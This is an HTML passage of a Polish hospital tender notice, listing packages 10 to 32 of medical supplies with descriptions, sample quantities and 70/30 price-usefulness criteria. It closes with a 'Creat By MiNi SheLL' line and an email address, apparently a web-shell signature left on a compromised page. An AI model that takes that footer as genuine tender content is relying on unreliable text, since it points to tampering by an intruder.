<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość uzytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> PAKIET NR 10 - emulacyjny test sterylizacji klasy 6 ( TST).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> emulacyjny test sterylizacji klasy 6 ( T czas, S - steam, T - temperatura)- nietoksyczny(wynikający z dokumentów przedstawionych przez firmę), samoprzylepny, pokryte klejem gwarantującym łatwe i trwałe przyklejanie do dokumentacji, czytelny, ( jednoznaczny w odczycie) o  wartościach ustalonych 121 stop. C i  134 stop. C dokładność wskazania w zakresie temperatury + 0 stop. C- 1 stop. C w zakresie czasu +0 - 6 ustalonej wartości.  
Próbki w ilości : 2 sztuk ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> PAKIET NR 11 - zestaw do żywienia dojelitowego do pompy PATROL.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zestaw do żywienia dojelitowego do pompy PATROL-pojedynczo pakowany, sterylny, umożliwiające żywienie pacjenta metodą ciągłego wlewu  do pompy typu PATROL (umożliwiające połączenie z jednej strony z miękkim opakowaniem  diety do żywienia enteralnego szklane butelki o pojemności 500 ml, a z drugiej strony ze zgłębnikiem). Części składowe przyrządu: łącznik pasujący do butelek zamkniętych kapslem, filtr powietrza, komora kroplowa, regulator przepływu, zacisk rolkowy, otwór do podawania leków, żeńska końcówka do połączenia ze zgłębnikiem , stożkowa końcówka męska 5 - stopniowa do łączenia ze zgłębnikiem + nasadka chroniąca przed kurzem, stożkowa końcówka męska 4 - stopniowa do łączenia ze zgłębnikiem oraz dołączony plastikowy koszyczek do zawieszenia butelki na stojaku.
Próbki: 2 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> PAKIET NR 12- etykieta samoklejąca ze wskaźnikami.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> etykieta samoklejąca ze wskaźnikami do pary wodnej(121o C i 134o C) i tlenku etylenu, na rolce, pokryty klejem gwarantującym łatwe przyklejanie się do powierzchni oraz ponowne naklejenie na dokumentację, odporna na wilgotność i temperaturę i ? powierzchni etykiety przeznaczona na opis.                   rozmiar  25mm x 75 mm. 
Próbki w ilości: 3 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> PAKIET NR 13- łącznik kątowy do układu oddechowego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -łącznik kątowy nieruchomy do układu oddechowego, jednorazowego użyku, sterylny lub biologicznie czysty, pojedynczo pakowany. Łącznik kątowy z standardowym portem 7,6 mm. Zatyczka portu przymocowana na stałe do łącznika, aby jej nie zgubić. Rozmiar łącznika kątowego 22M-22M/15 F
Próbki w ilości: 2 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> PAKIET NR 14- standardowy łącznik Y do układu oddechowego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jednorazowego użytku sterylny lub biologicznie czysty, pojedynczo pakowany, z jednym lub dwoma portami 7,6 mm, zatyczki portów przymocowane na stałe do łącznika, aby je nie zgubić. Rozmiar: 22M, 22M-22 M/15 M.
Próbki w ilości: 2 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> PAKIET NR 15- kapturek zabezpieczający.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kapturek zabezpieczający układ oddechowy, jednorazowego użytku, sterylny lub biologicznie czysty, pojedynczo pakowany. Rozmiar 22 F 
Próbki w ilości: 2 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> PAKIET NR 16- dren tlenowy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dren tlenowy jednorazowego użytku, sterylny lub biologicznie czysty, pakowany pojedynczo. Dren tlenowy o gwiazdkowym przekroju, odkształcający się po zagięciu, zakończenia(końcówki drenu) zapewniające szczelne połączenie do przepływomierza lub aparatu Ambu.
 Rozmiar:  długość drenu od 2 do 2,5 m 
Próbki w ilości: 2 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> PAKIET NR 17- przedłużacz światłoczuły do pompy infuzyjnej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przedłużacz światłoczuły do pompy infuzyjnej -sterylny, końcówki z gwintem z elastycznego tworzywa odpornego na załamanie, z możliwością podłączenia do kaniuli obwodowej, długość drenika nie krótszy niż 150cm, pakowany pojedynczo w formie luźnego zwoju. 
Próbki w ilości :  3 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatnośc(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> PAKIET NR 18  - dren do zestawu 2- butlowego z portem.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dren do zestawu 2 - butlowego  z portem, z regulacją  zastawki wodnej, jednorazowego użytku, sterylny, pakowany pojedynczo, dren do pacjenta przeźroczysty, zabezpieczony przed zagięciem opaską spiralną lub harmonijkową. Każdy zestaw pakowany dwuwarstwowo.
Próbki w ilości :  2  sztuki  ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> PAKIET NR 19 - Dozownik tlenu do pojemników jednorazowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dozownik do dozowania tlenu do dróg oddechowych z możliwością nawilżania tlenu z pojemnika jednorazowego RESPIFLOW z wodą destylowaną, wielkość 160x105x67, zakres wskazań 1-15 l/min., nawilżanie tlenu max 60%, masa ok. 0,35 kg. 
Do każdego dozownika dołączona karta gwarancyjna.
Wykonawca przez okres 4 lat zapewnia udostępnienie części zamiennych wraz z danymi adresowymi serwisu.
Próbki w ilości: 1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> PAKIET NR 20- Przyrząd Światłoczuły do infuzji do  podawania cytostatyków.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przyrząd światłoczuły do infuzji  do podawania cytostatyków - przyrząd światłoczuły do podawania cytostatyków, koloru bursztynowego-umożliwiajacy obserwację przepływu infuzji, sterylny, kompatybilny z komercyjnymi systemami Luer, pojedynczo pakowany, jednorazowego użytku, musi zawierać: ostry kolec ostrza, drożny odpowietrznik z filtrem przeciwbakteryjnym, elastyczną komorę kroplową (wielkość komory: 5-6,5cm), zaciskacz rolkowy do sterowania prędkością przepływu płynu, łącznik Luer-lock umożliwiający szczelne i trwałe połączenie z kaniulą,  filtr w tzw. (komorze kroplowej) (o wielkości oczka 15 mikronów), dokładnie oznaczony na opakowaniu rodzaj aparatu (aparat przeznaczony do podawania leków cytostatycznych), dren elastyczny, odporny na załamania o długości 150 cm.
 Próbki w ilości :  6 szt.
- przyrząd światłoczuły dwudrożny do infuzji do podawania cytostatyków - przyrząd światłoczuły do podawania cytostatyków, koloru bursztynowego-umożliwiajacy obserwację przepływu infuzji, sterylny, kompatybilny z komercyjnymi systemami Luer, pojedynczo pakowany, jednorazowego użytku, musi zawierać: ostry kolec ostrza, drożny odpowietrznik z filtrem przeciwbakteryjnym, elastyczną komorę kroplową (wielkość komory: 5-6,5cm), zaciskacz rolkowy do sterowania prędkością przepływu płynu, łącznik Luer-lock umożliwiający szczelne i trwałe połączenie z kaniulą,  filtr w tzw. (komorze kroplowej) (o wielkości oczka 15 mikronów), dokładnie oznaczony na opakowaniu rodzaj aparatu (aparat przeznaczony do podawania leków cytostatycznych), dren elastyczny, odporny na załamania o długości 150 cm.
W części górnej rozgałęzienie drenu umożliwiające połączenie płynu kroplówki z lekiem i płynu infuzyjnego.
Próbki w ilości :  6 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> PAKIET NR 21- Pneumotachograf do aparatu Pneumo.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Próbki w ilości :  2 sztuka ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> PAKIET NR 22-Koreczek- zatyczka do zabezpieczania aparatów po przetoczeniu krwi.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jednorazowego użytku, pakowany pojedynczo, z jednej strony końcówka LUER-LOCK z drugiej zatyczka. 
Próbki w ilości :  2 sztuki ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> PAKIET NR 23  - Etykieta name.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Etykieta samoprzylepna a 1000 szt, biała, w paskach po 10 szt na każdym pasku, rozmiar 38x25mm
Próbki w ilości : 2 pasków po 10 sztuk ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość uzytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> PAKIET NR 24   -Licznik igieł.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Magnetyczny, pojedynczy, z przylepcem, sterylny, pojemność 10x10(wskaźnika igieł), odporny ma przebicia
Próbki w ilości : 3 sztuki ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> PAKIET NR 25   -Termometr elektroniczny.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termometr elektroniczny do stosowania w szpitalu, na baterie, stosowany do szybkiego, bezpiecznego pomiaru temperatury. Obudowa wodoszczelna, możliwość dezynfekcji termometru zarówno przez przecieranie jak i zanurzenie w preparatach dezynfekcyjnych. W obudowie wyświetlacz cyfrowy, podający wynik wyraźny w odczycie,  do 1- 2 miejsc po przecinku. Czas uzyskania wyniku 60-90 sekund. Termometr powinien zachować w pamięci ostatni pomiar. 
Zakres wskazania temperatury 32-42 oC +-0,1.
Termometr zakończony metalowym miernikiem temperatury. W obudowie przycisk włączający, sygnalizacja dźwiękowa zakończenia pomiaru. 
Próbki w ilości :  sztuk 1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> PAKIET NR 26 -  Pompowana miska do mycia głowy pacjentów leżących.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pompowana miska wykonana z miękkiego, wysokiej jakości PCV, wyprofilowana pod szyję, z zaworem do spuszczania wody.
Próbki w ilości :  folder ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> PAKIET NR 27   - Pojnik dla chorych do karmienia i picia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Plastikowy, z uchwytem, z dziubkiem do picia, z rodzajami przykrywek małą i dużą w zależności od karmienia lub picia, pojemność 200 ml. 
Próbki w ilości :  2 sztuki.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność (wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> PAKIET NR 28   - Podkład hydrostopowy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podkład hydrostopowy, rozmiar 140x90cm, nieprzemakalny z dzianiny bawełniano-poliestrowej typu frotte. Odporny na kwasy i zasady oraz na działanie środków dezynfekcyjnych. Nie powoduje alergii i uczuleń. Daje możliwość wielokrotnego użycia. Do stosowania dzianiną do ciała.  
Próbki w ilości :  2 sztuki.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> PAKIET NR 29   - Okulary ochronne dla dorosłych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Okulary plastikowe, przeźroczyste, zabezpieczające oczy przed narażeniem na materiały biologiczne, wielokrotnego użytku.
Próbki w ilości :  2 sztuki ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> PAKIET NR 30- Multi-adapter.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> adapter współpracujący z kaniulą obwodową do pobierania krwi do kilku probówko strzykawek do  systemu zamkniętego z metodą pobrań krwi - aspiracyjno - próżniową; urządzenie to umożliwia pobieranie krwi do kilku probówko strzykawek z kaniuli obwodowej(również z wkłucia stałego) bez użycia igły do pobierania krwi.
Próbki w ilości :  2 sztuki ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> PAKIET NR 31   - Zestaw do oznaczania OB.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw typu BIER-PAD,  składający się z 300 szt. probówek płaskodennych  na 1 ml krwi  z roztworem cytrynianu sodowego, rurki szklanej do OB. 20 sztuk oraz podstawki do probówek w ilości 2 sztuk
Próbki w ilości :  5 rurek szklanych do OB oraz 10 probówek z cytrynianem..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> PAKIET NR 32  - Probówka z cytrynianem.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Probówka płaskodenna na 1ml krwi z cytrynianem sodowym 
Próbki w ilości :  10 probówek z cytrynianem ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com